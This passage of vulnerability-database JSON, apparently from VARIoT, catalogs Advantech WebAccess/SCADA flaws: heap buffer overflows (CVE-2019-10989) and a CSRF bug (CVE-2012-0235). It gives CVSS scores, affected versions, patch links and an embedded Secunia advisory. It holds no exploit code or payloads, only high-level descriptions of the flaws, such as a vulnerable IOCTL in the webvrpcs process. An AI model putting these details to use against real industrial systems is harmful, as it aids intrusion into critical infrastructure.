"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-10989", "trust": 1.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-10989", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-10989", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-32464", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201906-1078", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-142590", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "VULHUB", "id": "VHN-142590" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "CNNVD", "id": "CNNVD-201906-1078" }, { "db": "NVD", "id": "CVE-2019-10989" } ] }, "description": { "_id": null, "data": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple heap-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. Note: A different vulnerability than CVE-2019-10991. WebAccess/SCADA Contains a buffer error vulnerability. This vulnerability CVE-2019-10991 Is a different vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11372 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities:\n1. A directory-traversal vulnerability\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. Multiple heap-based buffer-overflow vulnerabilities\n4. Multiple remote-code execution vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (\u00e2??../\u00e2??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. \nAdvantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2019-10989" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "BID", "id": "108923" }, { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "VULHUB", "id": "VHN-142590" } ], "trust": 3.96 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-10989", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-19-591", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-19-590", "trust": 2.4 }, { "db": "BID", "id": "108923", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201906-1078", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-32464", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005814", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8068", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8067", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "IVD", "id": "A3A80884-2713-49F5-A1E2-0B387C0701CC", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-142590", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "VULHUB", "id": "VHN-142590" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "CNNVD", "id": "CNNVD-201906-1078" }, { "db": "NVD", "id": "CVE-2019-10989" } ] }, "id": "VAR-201906-1027", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "VULHUB", "id": "VHN-142590" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "CNVD", "id": "CNVD-2019-32464" } ] }, "last_update_date": "2024-11-23T21:52:09.381000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-32464)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181497" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=94181" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "CNNVD", "id": "CNNVD-201906-1078" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-142590" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "NVD", "id": "CVE-2019-10989" } ] }, "references": { "_id": null, "data": [ { "trust": 4.2, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 2.3, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-591/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-590/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10989" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/108923" }, { "trust": 0.9, "url": "http://webaccess.advantech.com" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10989" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-591" }, { "db": "ZDI", "id": "ZDI-19-590" }, { "db": "CNVD", "id": "CNVD-2019-32464" }, { "db": "VULHUB", "id": "VHN-142590" }, { "db": "BID", "id": "108923" }, { "db": "JVNDB", "id": "JVNDB-2019-005814" }, { "db": "CNNVD", "id": "CNNVD-201906-1078" }, { "db": "NVD", "id": "CVE-2019-10989" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc", "ident": null }, { "db": "ZDI", "id": "ZDI-19-591", "ident": null }, { "db": "ZDI", "id": "ZDI-19-590", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32464", "ident": null }, { "db": "VULHUB", "id": "VHN-142590", "ident": null }, { "db": "BID", "id": "108923", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-005814", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201906-1078", "ident": null }, { "db": "NVD", "id": "CVE-2019-10989", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-591", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-590", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32464", "ident": null }, { "date": "2019-06-28T00:00:00", "db": "VULHUB", "id": "VHN-142590", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005814", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1078", "ident": null }, { "date": "2019-06-28T21:15:11.243000", "db": "NVD", "id": "CVE-2019-10989", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-591", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-590", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32464", "ident": null }, { "date": "2023-03-02T00:00:00", "db": "VULHUB", "id": "VHN-142590", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005814", "ident": null }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1078", "ident": null }, { "date": "2024-11-21T04:20:18.283000", "db": "NVD", "id": "CVE-2019-10989", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1078" } ], "trust": 0.6 }, "title": { "_id": null, "data": "WebAccess/SCADA Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005814" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "a3a80884-2713-49f5-a1e2-0b387c0701cc" }, { "db": "CNNVD", "id": "CNNVD-201906-1078" } ], "trust": 0.8 } }
var-201202-0215
Vulnerability from variot
Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. Advantech/BroadWin WebAccess Contains a cross-site request forgery vulnerability.Authentication may be hijacked by a third party. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0215", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "CNNVD", "id": "CNNVD-201202-411" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001553" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0235", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "CVE-2012-0235", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "197d942a-2354-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "VHN-53516", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0235", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0235", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-411", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53516", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53516" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "CNNVD", "id": "CNNVD-201202-411" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. Advantech/BroadWin WebAccess Contains a cross-site request forgery vulnerability.Authentication may be hijacked by a third party. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0235" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53516" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0235", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-411", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0664", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001553", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "197D942A-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53516", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "VULHUB", "id": "VHN-53516" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-411" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "id": "VAR-201202-0215", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "VULHUB", "id": "VHN-53516" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0664" } ] }, "last_update_date": "2024-11-23T21:46:31.370000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Cross-Site Request Forgery Vulnerability (CNVD-2012-0664)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10211" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53516" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, 